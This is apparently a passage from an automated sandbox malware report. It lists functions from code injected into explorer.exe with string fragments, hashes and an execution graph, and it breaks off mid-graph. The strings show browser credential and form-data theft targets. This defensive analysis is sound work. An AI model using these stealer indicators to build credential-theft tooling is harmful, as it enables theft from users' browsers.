                                                          control_flow_graph 457 8693412-8693446 call 869e942 460 8693448-8693472 call 86a0c9e CreateThread 457->460 461 8693473-869347d 457->461
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction ID: 85138430dffd555042c01004626e97cff6eef8d481cfbb89d895fe504e846473
                                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                          • Instruction Fuzzy Hash: E0F0C234268B484FDB88EB2CD44562AB3D4EBA8215F45063EA58EC3364DA79C5814B56

                                                          Non-executed Functions

                                                          Function 0E81DD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                          • API String ID: 0-393284711
                                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction ID: 0f7e1fff99389f49ca319c6c08cb2be90c8ada8559b26193050f0367bfb8df82
                                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                          • Instruction Fuzzy Hash: B4E16870618F588FC765EF68C4947AAB7E0FB58301F404A2E959BC7245EF30A9418B8A
                                                          Function 0E820792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                          • API String ID: 0-2916316912
                                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction ID: 35dcbcaaa18af95af84277b19629074e1e7285c57bc2ffe792ed4928c5c3dbca
                                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                          • Instruction Fuzzy Hash: 67B16C30518B488FDB59EF68C485AEEB7F1FF98300F50492ED49ACB251EF7099458B86
                                                          Function 0E81E622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                          • API String ID: 0-1539916866
                                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction ID: 8965020d7752c0dc5dbef5eb43c23405faf66bfe27dcf1d22e63ef25d5639e58
                                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                          • Instruction Fuzzy Hash: C3419070A18B088FDB14DF88A4996AD7BE6FB48700F00025EE809D7245DBB59D458BD6
                                                          Function 0E825AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                          • API String ID: 0-355182820
                                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction ID: 24cc54d3aa5f5a0f54fecb37b9a427f86158a9f727574f43c8ab0664316c51c0
                                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                          • Instruction Fuzzy Hash: 79C15B74218F198FC759EF28C495AAAF3E5FB94304F404A2E949AC7250DF30EA55CB87
                                                          Function 0E825F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                          • API String ID: 0-97273177
                                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction ID: fc08ce7491041c52a0916f65f3a7009aff13fe42f15fd1499658bc24bc24aef0
                                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                          • Instruction Fuzzy Hash: F651D4315187488FD719DF18D8816AAB7E5FB85700F501A3EE8CBC7246DBB4A946CB83
                                                          Function 0E81F2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction ID: 2823aa7d2b31dbf1754ea4081ae239bd900cb349834087b4572e0c105dcb9274
                                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                          • Instruction Fuzzy Hash: F2C1A070628A198FCB58EF68D495AAAB3E5FF98300F44476D940ED7250DF30AA41CBC6
                                                          Function 0E81F2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                          • API String ID: 0-639201278
                                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction ID: 5f1c94f882815b488b1776455a70cff5ac23e3a8db77502625db934a0b83f2b9
                                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                          • Instruction Fuzzy Hash: 37C1A170628A198FCB58EF68D495AAAB3E5FF98300F44476D940ED7250DF30AA41CBC6
                                                          Function 0E820CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction ID: 16265dd4b8e43bc8cbd50c1645736ca4dd4f9a0eeaf9700d01b8bf0e38afb623
                                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                          • Instruction Fuzzy Hash: E1A191706187588FDB19EFA8D4447EEB7E1FF98300F40462ED48AD7291EF709985878A
                                                          Function 0E820CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: UR$2$L: $Pass$User$name$word
                                                          • API String ID: 0-2058692283
                                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction ID: ed06f1ca5f3617dab4e2536ff7a7cb4a5e4b77ba144a0b204a1c6bbdc2940e17
                                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                          • Instruction Fuzzy Hash: 9E9182706187588FDB19EFA8D4447EEB7E1FF98300F40462ED44AD7291EF709985878A
                                                          Function 0E820352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $.$e$n$v
                                                          • API String ID: 0-1849617553
                                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction ID: f522c088a5b0051e54f19b4bc5c1d36be62698cc34c7b2f2ae9b7b719aaa098c
                                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                          • Instruction Fuzzy Hash: BA717031618A498FD758EFA8C4847AAB7F1FF58304F00063FD44AD7261EB71AD858B86
                                                          Function 0E81BC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                                          • API String ID: 0-1970020201
                                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction ID: ebdb8a37c39fd695665603d066956710328f37a4fcb935ed5ac4a2064305b811
                                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                          • Instruction Fuzzy Hash: 4C514FB0918B4C8FDB55EFA8C0456EEB7F1FF58300F404A2E959AE7254EF7095418B8A
                                                          Function 0E81C86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4$\$dll$ion.$vers
                                                          • API String ID: 0-1610437797
                                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction ID: f95b072eb3b4490bb922f6b9ec2cd3afeb139d03f6c96d3e0176536233a7b126
                                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                          • Instruction Fuzzy Hash: 24416030658B8C8BCB69EF2898557EAB7E4FB98301F41462E985EC7240EF30D9458782
                                                          Function 0E81E4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 32.d$cli.$dll$sspi$user
                                                          • API String ID: 0-327345718
                                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction ID: 6d8f3d094b56a6a5a55f6c497700425db9e0b1a1e277157b9c8c5caf2bcee9d0
                                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                          • Instruction Fuzzy Hash: 67413E30A18E1D8FCB54EFA880957ED77E5FB58300F5445AAAC0ED7250EA71D9818B86
                                                          Function 0E81C432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$el32$h$kern
                                                          • API String ID: 0-4264704552
                                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction ID: b066ace958ff702f7c2769ed6ace166bc904f4d47c8c96308fa37b6eda0180de
                                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                          • Instruction Fuzzy Hash: 1D417170608B498FD769DF6980843AAFBE5FB98300F104A6F949EC3255DB70C945CB82
                                                          Function 0E8230B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction ID: 83beb682bd0ea901ab342669c442fc6c9a475db3120a34495ebc4da4539a6d6e
                                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                          • Instruction Fuzzy Hash: C631F87150CB485FD71AEB28C4846EAB7D4FB94300F504D2EE49BC7291EE35A989CB43
                                                          Function 0E8230C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $Snif$f fr$om:
                                                          • API String ID: 0-3434893486
                                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction ID: a8630b586e7f5af733d1e1d575bb552add76bd249e92f350b4d3cbe8cf4f9c67
                                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                          • Instruction Fuzzy Hash: 0231F471508B486FD71AEB28C4846EAB7D4FB94300F404D2EE49BC7295EE30E986CA43
                                                          Function 0E81EFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction ID: 5cef503dfcc6dd06b51d7c6989d0db0166823d2d277a959bbb0a4674854d730b
                                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                          • Instruction Fuzzy Hash: BD317E70218B188FCB84EF688494BAAB7E1FF98200F844A7D944ECB254DF30C985CB53
                                                          Function 0E81EFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .dll$chro$hild$me_c
                                                          • API String ID: 0-3136806129
                                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction ID: f9f8ef8b4aecf8b511f15df33d6a5c5d5bbc214ef348125946d40f0719fdc0c4
                                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                          • Instruction Fuzzy Hash: 02316D70218B188FCB94EF688494BAAB7E1FF98300F944A7D944ACB255DF30C985CB53
                                                          Function 0E8218C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: ed8e8a2a763326d0eec12ceada4c7333bb61686fe0066ee1d826419b241f1b4e
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: 2631DF31614A1C8BCF15EFA8C8847EEB7E0FF58204F40062EE45ED7240DE788A85C78A
                                                          Function 0E8218BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 0-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: c5ec1e8255ca0c624e5ba507c39f2487970637a1e99dd13bdfed0e01d9a112c8
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: 2321C371610A1C8BCF15EFA8C8847ED7BF0FF58204F40462ED45AD7240DE748A858786
                                                          Function 0E822E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction ID: eff4ceaa8150392b031b0c466cb1df587d5c8a9eb86954be8d787273494124ae
                                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                          • Instruction Fuzzy Hash: E4218B74A24B1D9FDB48EFA8C0447AEBAF0FF18310F504A2ED009D3610DB789995CB85
                                                          Function 0E822E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$l$l$t
                                                          • API String ID: 0-168566397
                                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction ID: 5a348cb0637b65bcd5cb3092a2cf9c30f98c4fae06b7eed3b7e0319b785d9f28
                                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                          • Instruction Fuzzy Hash: EE216B74A24B1D9BDB48EFA8D0447EEBBF1FF18314F504A2ED009D3600DB7999958B85
                                                          Function 0E822FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3749530488.000000000E7C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E7C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_e7c0000_explorer.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: auth$logi$pass$user
                                                          • API String ID: 0-2393853802
                                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction ID: d62b6559fef45c24019ed897b2a5faa481d399eef919bee97d921ae925457a8c
                                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                          • Instruction Fuzzy Hash: 2F21C030614B0D8BCF05DF9D98906EEB7E1EF88344F00562DD40ADB244D7B4E9548BC2

                                                          Execution Graph

                                                          Execution Coverage:1.7%
                                                          Dynamic/Decrypted Code Coverage:6.8%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:622
                                                          Total number of Limit Nodes:79
                                                          execution_graph 108106 4c32ad0 LdrInitializeThunk 108110 2caf0dd 108113 2cab9c0 108110->108113 108114 2cab9e6 108113->108114 108121 2c99d30 108114->108121 108116 2cab9f2 108117 2caba16 108116->108117 108129 2c98f30 108116->108129 108167 2caa6a0 108117->108167 108170 2c99c80 108121->108170 108123 2c99d3d 108124 2c99d44 108123->108124 108182 2c99c20 108123->108182 108124->108116 108130 2c98f57 108129->108130 108600 2c9b1b0 108130->108600 108132 2c98f69 108604 2c9af00 108132->108604 108134 2c98f86 108141 2c98f8d 108134->108141 108675 2c9ae30 LdrLoadDll 108134->108675 108137 2c98ffc 108620 2c9f400 108137->108620 108139 2c99006 108140 2cabf80 2 API calls 108139->108140 108162 2c990f2 108139->108162 108142 2c9902a 108140->108142 108141->108162 108608 2c9f370 108141->108608 108143 2cabf80 2 API calls 108142->108143 108144 2c9903b 108143->108144 108145 2cabf80 2 API calls 108144->108145 108146 2c9904c 108145->108146 108632 2c9ca80 108146->108632 108148 2c99059 108149 2ca4a40 8 API calls 108148->108149 108150 2c99066 108149->108150 108151 2ca4a40 8 API calls 108150->108151 108152 2c99077 108151->108152 108153 2c990a5 108152->108153 108154 2c99084 108152->108154 108156 2ca4a40 8 API calls 108153->108156 108642 2c9d610 108154->108642 108164 2c990c1 108156->108164 108159 2c990e9 108160 2c98d00 23 API calls 108159->108160 108160->108162 108161 2c99092 108658 2c98d00 108161->108658 108162->108117 108164->108159 108676 2c9d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 108164->108676 108168 2caa6bf 108167->108168 108169 2caaf50 LdrLoadDll 108167->108169 108169->108168 108202 2ca8bb0 108170->108202 108174 2c99ca6 108174->108123 108175 2c99c9c 108175->108174 108209 2cab2a0 108175->108209 108177 2c99ce3 108177->108174 108220 2c99aa0 108177->108220 108179 2c99d03 108226 2c99620 LdrLoadDll 108179->108226 108181 2c99d15 108181->108123 108183 2c99c2f 108182->108183 108575 2cab590 108183->108575 108186 2cab590 LdrLoadDll 108187 2c99c4b 108186->108187 108188 2cab590 LdrLoadDll 108187->108188 108189 2c99c61 108188->108189 108190 2c9f170 108189->108190 108191 2c9f189 108190->108191 108583 2c9b030 108191->108583 108193 2c9f19c 108587 2caa1d0 108193->108587 108195 2c99d55 108195->108116 108198 2c9f1c2 108199 2c9f1ed 108198->108199 108593 2caa250 108198->108593 108201 2caa480 2 API calls 108199->108201 108201->108195 108203 2ca8bbf 108202->108203 108227 2ca4e40 108203->108227 108205 2c99c93 108206 2ca8a60 108205->108206 108233 2caa5f0 108206->108233 108210 2cab2b9 108209->108210 108240 2ca4a40 108210->108240 108212 2cab2d1 108213 2cab2da 108212->108213 108279 2cab0e0 108212->108279 108213->108177 108215 2cab2ee 108215->108213 108297 2ca9ef0 108215->108297 108553 2c97ea0 108220->108553 108222 2c99ac1 108222->108179 108223 2c99aba 108223->108222 108566 2c98160 108223->108566 108226->108181 108228 2ca4e5a 108227->108228 108229 2ca4e4e 108227->108229 108228->108205 108229->108228 108232 2ca52c0 LdrLoadDll 108229->108232 108231 2ca4fac 108231->108205 108232->108231 108236 2caaf50 108233->108236 108235 2ca8a75 108235->108175 108237 2caaf60 108236->108237 108239 2caaf82 108236->108239 108238 2ca4e40 LdrLoadDll 108237->108238 108238->108239 108239->108235 108241 2ca4a54 108240->108241 108242 2ca4d75 108240->108242 108241->108242 108305 2ca9c40 108241->108305 108242->108212 108245 2ca4b6d 108245->108212 108246 2ca4b63 108365 2caa450 LdrLoadDll 108246->108365 108247 2ca4b80 108308 2caa350 108247->108308 108250 2ca4ba7 108251 2cabdb0 2 API calls 108250->108251 108254 2ca4bb3 108251->108254 108252 2ca4d39 108253 2caa480 2 API calls 108252->108253 108256 2ca4d40 108253->108256 108254->108245 108254->108252 108255 2ca4d4f 108254->108255 108259 2ca4c42 108254->108259 108374 2ca4780 LdrLoadDll NtReadFile NtClose 108255->108374 108256->108212 108258 2ca4d62 108258->108212 108260 2ca4ca9 108259->108260 108262 2ca4c51 108259->108262 108260->108252 108261 2ca4cbc 108260->108261 108367 2caa2d0 108261->108367 108264 2ca4c6a 108262->108264 108265 2ca4c56 108262->108265 108266 2ca4c6f 108264->108266 108267 2ca4c87 108264->108267 108366 2ca4640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 108265->108366 108311 2ca46e0 108266->108311 108267->108256 108323 2ca4400 108267->108323 108272 2ca4c60 108272->108212 108273 2ca4c7d 108273->108212 108275 2ca4d1c 108371 2caa480 108275->108371 108276 2ca4c9f 108276->108212 108278 2ca4d28 108278->108212 108280 2cab0f1 108279->108280 108281 2cab103 108280->108281 108392 2cabd30 108280->108392 108281->108215 108283 2cab124 108395 2ca4060 108283->108395 108285 2cab170 108285->108215 108286 2cab147 108286->108285 108287 2ca4060 3 API calls 108286->108287 108289 2cab169 108287->108289 108289->108285 108427 2ca5380 108289->108427 108290 2cab1fa 108292 2cab20a 108290->108292 108521 